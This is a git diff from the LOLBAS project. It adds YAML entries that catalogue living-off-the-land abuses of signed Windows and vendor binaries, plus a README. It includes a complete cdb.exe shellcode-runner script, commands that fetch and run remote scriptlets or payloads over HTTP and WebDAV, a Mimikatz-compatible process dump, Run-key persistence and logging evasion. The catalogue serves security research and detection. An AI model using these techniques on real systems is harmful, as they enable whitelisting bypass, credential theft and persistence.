+++ b/OtherBinaries/Nvudisp.yml
@@ -0,0 +1,26 @@
+---
+Name: Nvudisp.exe
+Description: Execute, Copy, Add registry, Create shortcut, kill process
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Nvudisp.exe System calc.exe
+    Description: Execute calc.exe as a subprocess.
+  - Command: Nvudisp.exe Copy test.txt,test-2.txt
+    Description: Copy fila A to file B.
+  - Command: Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
+    Description: Add/Edit a Registry key value.
+  - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
+    Description: Create shortcut file.
+  - Command: Nvudisp.exe KillApp calculator.exe
+    Description: Kill a process.
+  - Command: Nvudisp.exe Run foo
+    Description: ?
+Full Path:
+  - C:\windows\system32\nvuDisp.exe
+Code Sample: []
+Detection: []
+Resources:
+  - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherBinaries/Nvuhda6.yml b/OtherBinaries/Nvuhda6.yml
new file mode 100644
index 0000000..1c3b979
--- /dev/null
+++ b/OtherBinaries/Nvuhda6.yml
@@ -0,0 +1,26 @@
+---
+Name: Nvuhda6.exe
+Description: Execute, Copy, Add registry, Create shortcut, kill process
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: nvuhda6.exe System calc.exe
+    Description: Execute calc.exe as a subprocess.
+  - Command: nvuhda6.exe Copy test.txt,test-2.txt
+    Description: Copy fila A to file B.
+  - Command: nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
+    Description: Add/Edit a Registry key value
+  - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
+    Description: Create shortcut file.
+  - Command: nvuhda6.exe KillApp calc.exe
+    Description: Kill a process.
+  - Command: nvuhda6.exe Run foo
+    Description: ?
+Full Path:
+  - ?
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
+Notes: Thanks to Adam - @hexacorn
diff --git a/OtherBinaries/ROCCAT_Swarm.yml b/OtherBinaries/ROCCAT_Swarm.yml
new file mode 100644
index 0000000..7cf7d0b
--- /dev/null
+++ b/OtherBinaries/ROCCAT_Swarm.yml
@@ -0,0 +1,16 @@
+---
+Name: ROCCAT_Swarm.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
+    Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
+Full Path:
+  - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/994213164484001793
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherBinaries/Setup.yml b/OtherBinaries/Setup.yml
new file mode 100644
index 0000000..6788570
--- /dev/null
+++ b/OtherBinaries/Setup.yml
@@ -0,0 +1,16 @@
+---
+Name: Setup.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Run Setup.exe
+    Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
+Full Path:
+  - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/994381620588236800
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherBinaries/Usbinst.yml b/OtherBinaries/Usbinst.yml
new file mode 100644
index 0000000..55e3956
--- /dev/null
+++ b/OtherBinaries/Usbinst.yml
@@ -0,0 +1,16 @@
+---
+Name: Usbinst.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
+    Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
+Full Path:
+  - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/993514357807108096
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherBinaries/VBoxDrvInst.yml b/OtherBinaries/VBoxDrvInst.yml
new file mode 100644
index 0000000..fba2f2c
--- /dev/null
+++ b/OtherBinaries/VBoxDrvInst.yml
@@ -0,0 +1,16 @@
+---
+Name: VBoxDrvInst.exe
+Description: Persistence
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
+    Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
+Full Path:
+  - C:\Program Files\Oracle\VirtualBox Guest Additions
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/993497996179492864
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherMSBinaries/Appvlp.yml b/OtherMSBinaries/Appvlp.yml
new file mode 100644
index 0000000..1fcc2d4
--- /dev/null
+++ b/OtherMSBinaries/Appvlp.yml
@@ -0,0 +1,22 @@
+---
+Name: Appvlp.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: AppVLP.exe \\webdav\calc.bat
+    Description: Executes calc.bat through AppVLP.exe
+  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
+    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
+  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
+    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
+Full Path:
+  - C:\Program Files\Microsoft Office\root\client\appvlp.exe
+  - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/MoooKitty/Code-Execution
+  - https://twitter.com/moo_hax/status/892388990686347264
+Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)
diff --git a/OtherMSBinaries/Bginfo.yml b/OtherMSBinaries/Bginfo.yml
new file mode 100644
index 0000000..8b00538
--- /dev/null
+++ b/OtherMSBinaries/Bginfo.yml
@@ -0,0 +1,20 @@
+---
+Name: Bginfo.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
+    Description: Execute VBscript code that is referenced within the bginfo.bgi file.
+  - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
+    Description: Execute bginfo.exe from a WebDAV server.
+  - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
+    Description: This style of execution may not longer work due to patch.
+Full Path:
+  - No fixed path
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
+Notes: Thanks to Oddvar Moe - @oddvarmoe
diff --git a/OtherMSBinaries/Cdb.yml b/OtherMSBinaries/Cdb.yml
new file mode 100644
index 0000000..7bde634
--- /dev/null
+++ b/OtherMSBinaries/Cdb.yml
@@ -0,0 +1,19 @@
+---
+Name: Cdb.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
+    Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
+Full Path:
+  - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
+  - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
+  - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
+  - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
+Notes: Thanks to Matt Graeber - @mattifestation
diff --git a/OtherMSBinaries/Csi.yml b/OtherMSBinaries/Csi.yml
new file mode 100644
index 0000000..4f77e96
--- /dev/null
+++ b/OtherMSBinaries/Csi.yml
@@ -0,0 +1,18 @@
+---
+Name: csi.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: csi.exe file
+    Description: Use csi.exe to run unsigned C# code.
+Full Path:
+  - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
+  - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subTee/status/781208810723549188
+  - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+Notes: Thanks to Casey Smith - @subtee
diff --git a/OtherMSBinaries/Dnx.yml b/OtherMSBinaries/Dnx.yml
new file mode 100644
index 0000000..9887d6e
--- /dev/null
+++ b/OtherMSBinaries/Dnx.yml
@@ -0,0 +1,17 @@
+---
+Name: dnx.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: dnx.exe consoleapp
+    Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
+Full Path:
+  - N/A
+Code Sample: []
+Detection: []
+Resources:
+  - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+Notes: Thanks to Matt Nelson - @enigma0x3
+
diff --git a/OtherMSBinaries/Dxcap.yml b/OtherMSBinaries/Dxcap.yml
new file mode 100644
index 0000000..2eded97
--- /dev/null
+++ b/OtherMSBinaries/Dxcap.yml
@@ -0,0 +1,17 @@
+---
+Name: Dxcap.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
+    Description: Launch notepad as a subprocess of Dxcap.exe
+Full Path:
+  - c:\Windows\System32\dxcap.exe
+  - c:\Windows\SysWOW64\dxcap.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/harr0ey/status/992008180904419328
+Notes: Thanks to Matt harr0ey - @harr0ey
diff --git a/OtherMSBinaries/Mftrace.yml b/OtherMSBinaries/Mftrace.yml
new file mode 100644
index 0000000..9834d5c
--- /dev/null
+++ b/OtherMSBinaries/Mftrace.yml
@@ -0,0 +1,21 @@
+---
+Name: Mftrace.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Mftrace.exe cmd.exe
+    Description: Launch cmd.exe as a subprocess of Mftrace.exe.
+  - Command: Mftrace.exe powershell.exe
+    Description: Launch cmd.exe as a subprocess of Mftrace.exe.
+Full Path:
+  - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
+  - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
+  - C:\Program Files (x86)\Windows Kits\10\bin\x86
+  - C:\Program Files (x86)\Windows Kits\10\bin\x64
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
+Notes: Thanks to fabrizio - @0rbz_
diff --git a/OtherMSBinaries/Msdeploy.yml b/OtherMSBinaries/Msdeploy.yml
new file mode 100644
index 0000000..5d07ebd
--- /dev/null
+++ b/OtherMSBinaries/Msdeploy.yml
@@ -0,0 +1,16 @@
+---
+Name: Msdeploy.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
+    Description: Launch calc.bat via msdeploy.exe.
+Full Path:
+  - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/995837734379032576
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherMSBinaries/Msxsl.yml b/OtherMSBinaries/Msxsl.yml
new file mode 100644
index 0000000..2bed376
--- /dev/null
+++ b/OtherMSBinaries/Msxsl.yml
@@ -0,0 +1,19 @@
+---
+Name: msxsl.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: msxsl.exe customers.xml script.xsl
+    Description: Run COM Scriptlet code within the script.xsl file (local).
+  - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
+    Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
+Full Path:
+  - N/A
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subTee/status/877616321747271680
+  - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
+Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)
diff --git a/OtherMSBinaries/Payload/Cdb_calc.wds b/OtherMSBinaries/Payload/Cdb_calc.wds
new file mode 100644
index 0000000..4073bb5
--- /dev/null
+++ b/OtherMSBinaries/Payload/Cdb_calc.wds
@@ -0,0 +1,93 @@
+$$ Save this to a file - e.g. x64_calc.wds
+$$ Example: launch this shellcode in a host notepad.exe process.
+$$ cdb.exe -cf x64_calc.wds -o notepad.exe
+
+$$ Allocate 272 bytes for the shellcode buffer
+$$ Save the address of the resulting RWX in the pseudo $t0 register
+.foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }
+
+$$ Copy each individual shellcode byte to the allocated RWX buffer
+$$ Note: The `eq` command could be used to save space, if desired.
+$$ Note: .readmem can be used to read a shellcode buffer too but
+$$   shellcode on disk will be subject to AV scanning.
+;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4
+;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00
+;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
+;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
+;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2
+;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52
+;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52
+;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52
+;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72
+;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7
+;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31
+;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0
+;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C
+;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41
+;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41
+;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED
+;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
+;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B
+;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01
+;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88
+;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
+;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67
+;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50
+;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
+;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
+;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56
+;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41
+;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
+;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31
+;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0
+;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9
+;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1
+;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1
+;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24
+;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1
+;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44
+;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
+;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41
+;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44
+;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49
+;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B
+;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
+;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
+;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A
+;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
+;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83
+;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
+;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41
+;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B
+;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF
+;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48
+;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
+;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
+;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D
+;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
+;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B
+;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5
+;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A
+;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6
+;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF
+;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4
+;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C
+;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0
+;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47
+;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A
+;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
+;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63
+;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00
+
+$$ Redirect execution to the shellcode buffer
+r @$ip=@$t0
+
+$$ Continue program execution - i.e. execute the shellcode
+g
+
+$$ Continue program execution after hitting a breakpoint
+$$ upon starting calc.exe. This is specific to this shellcode.
+g
+
+$$ quit cdb.exe
+q
\ No newline at end of file
diff --git a/OtherMSBinaries/Rcsi.yml b/OtherMSBinaries/Rcsi.yml
new file mode 100644
index 0000000..6f0b2b1
--- /dev/null
+++ b/OtherMSBinaries/Rcsi.yml
@@ -0,0 +1,15 @@
+---
+Name: rcsi.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rcsi.exe bypass.csx
+    Description: Use embedded C# within the csx script to execute the code.
+Full Path: ''
+Code Sample: []
+Detection: []
+Resources:
+  - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
+Notes: Thanks to Matt Nelson - @enigma0x3
diff --git a/OtherMSBinaries/Sqldumper.yml b/OtherMSBinaries/Sqldumper.yml
new file mode 100644
index 0000000..c3ec084
--- /dev/null
+++ b/OtherMSBinaries/Sqldumper.yml
@@ -0,0 +1,21 @@
+---
+Name: Sqldumper.exe
+Description: Dump process
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: sqldumper.exe 464 0 0x0110
+    Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
+  - Command: sqldumper.exe 540 0 0x01100:40
+    Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
+Full Path:
+  - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+  - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/countuponsec/status/910969424215232518
+  - https://twitter.com/countuponsec/status/910977826853068800
+  - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
+Notes: Thanks to Luis Rocha - @countuponsec
diff --git a/OtherMSBinaries/Sqlps.yml b/OtherMSBinaries/Sqlps.yml
new file mode 100644
index 0000000..3fd5a0b
--- /dev/null
+++ b/OtherMSBinaries/Sqlps.yml
@@ -0,0 +1,16 @@
+---
+Name: Sqlps.exe
+Description: Execute, evade logging
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Sqlps.exe -noprofile
+    Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
+Full Path:
+  - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/bryon_/status/975835709587075072
+Notes: Thanks to Bryon - @bryon_
diff --git a/OtherMSBinaries/Sqltoolsps.yml b/OtherMSBinaries/Sqltoolsps.yml
new file mode 100644
index 0000000..541dc2d
--- /dev/null
+++ b/OtherMSBinaries/Sqltoolsps.yml
@@ -0,0 +1,16 @@
+---
+Name: SQLToolsPS.exe
+Description: Execute, evade logging
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
+    Description: Run PowerShell scripts and commands.
+Full Path:
+  - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/993298228840992768
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherMSBinaries/Te.yml b/OtherMSBinaries/Te.yml
new file mode 100644
index 0000000..d361af8
--- /dev/null
+++ b/OtherMSBinaries/Te.yml
@@ -0,0 +1,15 @@
+---
+Name: te.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: te.exe bypass.wsc
+    Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
+Full Path: ''
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
+Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s
diff --git a/OtherMSBinaries/Tracker.yml b/OtherMSBinaries/Tracker.yml
new file mode 100644
index 0000000..2bedbd7
--- /dev/null
+++ b/OtherMSBinaries/Tracker.yml
@@ -0,0 +1,17 @@
+---
+Name: Tracker.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
+    Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
+Full Path: ''
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/subTee/status/793151392185589760
+  - https://attack.mitre.org/wiki/Execution
+
+Notes: Thanks to Casey Smith - @subTee
diff --git a/OtherMSBinaries/Vsjitdebugger.yml b/OtherMSBinaries/Vsjitdebugger.yml
new file mode 100644
index 0000000..b2836fa
--- /dev/null
+++ b/OtherMSBinaries/Vsjitdebugger.yml
@@ -0,0 +1,16 @@
+---
+Name: vsjitdebugger.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Vsjitdebugger.exe calc.exe
+    Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
+Full Path:
+  - c:\windows\system32\vsjitdebugger.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/990758590020452353
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherMSBinaries/Winword.yml b/OtherMSBinaries/Winword.yml
new file mode 100644
index 0000000..d877c2a
--- /dev/null
+++ b/OtherMSBinaries/Winword.yml
@@ -0,0 +1,17 @@
+---
+Name: winword.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: winword.exe /l dllfile.dll
+    Description: Launch DLL payload.
+Full Path:
+  - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/vysecurity/status/884755482707210241
+  - https://twitter.com/Hexacorn/status/885258886428725250
+Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)
diff --git a/OtherScripts/Testxlst.yml b/OtherScripts/Testxlst.yml
new file mode 100644
index 0000000..2f763d7
--- /dev/null
+++ b/OtherScripts/Testxlst.yml
@@ -0,0 +1,18 @@
+---
+Name: testxlst.js
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
+    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
+  - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
+    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
+Full Path:
+  - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/bohops/status/993314069116485632
+Notes: Thanks to Jimmy - @bohops
diff --git a/README.md b/README.md
index 5612430..3d0a136 100644
--- a/README.md
+++ b/README.md
@@ -1 +1,81 @@
-# LOLBAS
\ No newline at end of file
+# Living Off The Land Binaries and Scripts (and now also Libraries)
+
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">
+
+
+There are currently three different lists.
+
+* [LOLBins](LOLBins.md)    
+* [LOLLibs](LOLLibs.md)    
+* [LOLScripts](LOLScripts.md)    
+
+
+The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques. 
+
+Definition of LOLBAS candidates (Binaries,scripts and libraries):
+* LOLBAS candidates must be present on the system by default or introduced by application/software "installation" from a "reputable" vendor or open-source entity. Otherwise, LOLBAS determination is subject to scrutiny by the (security) community and agreed upon standards.
+* Can be used as an attacker tool directly or can perform other actions than what it was intended to do (Ex: regsvr32 - execute code from SCT online)
+  * executing code
+  * downloading/upload files
+  * bypass UAC
+  * compile code
+  * getting creds/dumping process
+  * surveillance (keylogger, network trace)
+  * evade logging/remove log entry
+  * side-loading/hijacking of DLL
+  * pass-through execution of other programs, script (via a LOLBin)
+  * pass-through persistence utilizing existing LOLBin
+  * persistence (Hide data in ADS, execute at logon etc)
+
+Right now it is me that decides if the files are a valid contribution or not. 
+I try my best to conclude with help from others in the InfoSec community and I do not wish to exclude anything. 
+Also, please be patient if it takes some time for your contribution to be added to the list. I am just one guy.   
+
+Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. 
+I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
+Would really love if the community could contribute as much as possible. That would make it better for everyone.
